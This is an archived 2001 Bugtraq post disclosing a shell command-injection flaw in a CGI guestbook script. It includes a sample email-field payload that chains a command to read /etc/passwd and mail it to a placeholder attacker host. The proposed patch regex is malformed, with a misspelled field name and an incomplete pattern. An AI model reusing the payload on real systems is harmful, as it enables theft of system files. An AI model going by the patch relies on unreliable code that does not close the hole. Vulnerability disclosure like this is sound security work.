Bugtraq mailing list archives
cgi vulnerability
From: "supdavid" <supdavid () bluewin ch>
Date: Tue, 30 Oct 2001 16:04:23 +0100
hi all I found a security hole in Book of guests and Post it! written by Seth Leonard. It is available at http://www.dreamcachersweb.com The problem is that this script doesn't filter out ANY metacharacters from the input and pass it to the shell. Therefore by writing something like email () mail com;cat /etc/passwd|mail evil () evilhost com into the email field, the attacker could take control over the host. patch: first of all it isn't a bad idea to set the permissions of the script corectly. Furthermore the line if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something like if ($INPUT{'emai'} =~ /^[\w-.]+\@[\w-.]) { ... } David Kumme, 16
Current thread:
- cgi vulnerability supdavid (Oct 30)